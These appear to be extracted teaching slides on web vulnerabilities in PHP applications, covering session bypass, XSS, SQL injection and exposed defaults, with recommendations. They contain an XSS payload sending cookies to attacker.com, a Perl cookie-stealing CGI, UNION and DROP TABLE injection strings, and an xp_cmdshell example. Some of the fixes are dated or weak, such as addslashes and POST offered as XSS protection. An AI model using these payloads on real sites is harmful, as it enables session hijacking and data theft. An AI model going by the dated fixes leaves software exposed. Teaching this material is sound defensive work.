Web Vulnerability

Web Vulnerability Saharudin Saat Session_start();

The most common • • • •

No session control (bypass authentication) XSS attack (cross site scripting) Sql Injection Default?

Session Control

Is this site vulnerable?

Session Control • User need to login before access system • Does the code really process the username and password? • In This case – no login required • We can bypass the login page just by inserting the url http://localhost/latihan/home.php

Session Control

Intruder can bypass your system just by inserting the url page!!

Session Control Recommendation Use session session_start(); – Every sensitive page must have access level control E.G if($level =='1') { header("Location: admin_menu.php"); } else if($level=='2') { header("Location: approve.php"); } else if($level=='4'){ header("Location: report.php");

Session Control check if no password entered if($pwd==''){ redirect to login page again. ?> <script language="javascript"> alert("not authorized!!"); window.location = "index.php";

Validation process need to be on server site to prevent code injection. Refer to e-rent folder file name session.php

XSS (cross site scripting)

XSS (cross site scripting) • By the succesful code injection into username input box <script>alert(“Boleh xss”) we know that this site is vulnerable to xss attack. • The attacker can do social engineer his victims by clicking on the malicious url to steal cookies (phishing)

XSS (cross site scripting)

XSS (cross site scripting)

document.location.replace('http://attacker.com/steal .cgi?'+docum ent.cookie);" onMouseOver="window.status='http://www.cnn.com/2002/S HOWBIZ/News/05/02/ clinton.talkshow.reut/index.html';return true" onMouseOut="window.status='';return true"> Check this CNN story out!

XSS (cross site scripting)

# The QUERY_STRING environment variable should be filled with # the cookie text after steal.cgi: # http://www.attacker.com/steal.cgi?XXXXX print COOKIES “$ENV{'QUERY_STRING'} from $ENV{‘REMOTE_ADDR’}\n”; # now email the alert as well so we can start to hijack open(MAIL,"|$mailprog -t"); print MAIL "To: attacker\@attacker.com\n"; print MAIL "From: cookie_steal\@attacker.com\n"; print MAIL "Subject: Stolen Cookie Submission\n\n"; print MAIL "-" x 75 . "\n\n"; print MAIL “$ENV{'QUERY_STRING'} from $ENV{‘REMOTE_ADDR’}\n”; close (MAIL);

XSS (cross site scripting) Recommendation • Use POST rather than GET in forms. Specify POST in the method attribute of your forms. Of course, this isn't appropriate for all of your forms, but it is appropriate when a form is performing an action, such as buying stocks. In fact, the HTTP specification requires that GET be considered safe. • Use $_POST rather than rely on register_globals. Using the POST method for form submissions is useless if you rely on register_globals and reference form variables like $symbol and $quantity. It is also useless if you use $_REQUEST. • Do not focus on convenience.

SQL injection

Simple sql injection to use valid username and password

SQL injection

Attacker use the first valid user in table login

SQL injection • Attacker might be lucky if the first name inside table login is an administrator. • If not? he might want to find administrator login and password • Can the attacker do that?

SQL injection

By inserting union statement in the url, attacker can view all login and password

SQL injection • The original url appear like this http://localhost/latihan/staffdetail.php?nostaf=654321 • Attacker then might try to do union sql statement to view username and password inside login table which appear like this : -http: //localhost/latihan/staffdetail.php?nostaf=654321%20uni on%20select%201,2,userid,katalaluan%20from%20admi nistrator

*Note %20 is unicode for space

.

SQL injection • If sql injection is possible, it is not impossible for attacker to drop table by adding drop table statement SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%'; • In some case, attacker making "EXEC xp_cmdshell 'dir c:'" the @query argument to view the output of "dir c:" in the webpage.

SQL injection Recommendation Filter your data. • This cannot be overstressed. With good data filtering in place, most security concerns are mitigated, and some are practically eliminated. Quote your data. • If your database allows it (MySQL does), put single quotes around all values in your SQL statements, regardless of the data type. Escape your data. • Sometimes valid data can unintentionally interfere with the format of the SQL statement itself. Use mysql_escape_string() or an escaping function native to your particular database. If there isn't a specific one, addslashes() is a good last resort.

Default?

Do you realize that other people on the internet can view your default setting?

Default?

Pay attention for any alert from the third party software about your web security

Default?

Attacker might browse your server files to find any information

References • Security focushttp://www.securityfocus.com/ • Packetstormhttp://packetstormsecurity.org/ • Milw0rm-www.milw0rm.com/ • Insecure.orghttp://sectools.org/web-scanners.html

session_destroy();

Thank You